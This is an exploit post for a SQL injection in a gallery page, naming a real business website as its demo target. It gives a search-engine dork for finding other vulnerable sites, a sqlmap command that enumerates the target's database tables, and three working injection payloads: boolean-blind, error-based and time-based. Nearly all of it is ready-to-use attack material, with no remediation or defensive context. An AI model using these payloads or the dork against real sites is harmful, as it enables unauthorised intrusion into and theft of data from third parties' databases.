# Exploit Title:Real Instruments SQL Injection
# Date:17.05.2019
# Dork :intitle:"Real Instruments" gallery.php?id=
# Exploit Author:Cerkuday
# Tested on:Windows &Kali Linux
#Demo:
http://www.realinstruments.ca/gallery.php?id=1
# Poc:
sqlmap -u "http://www.realinstruments.ca/gallery.php?id=1" --text-only --random-agent -D realinstruments --tables
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1497=1497
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=-3734 OR 1 GROUP BY CONCAT(0x71767a6b71,(SELECT (CASE WHEN (4299=4299) THEN 1 ELSE 0 END)),0x7178767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 3359=BENCHMARK(5000000,MD5(0x6a4f4b61))
---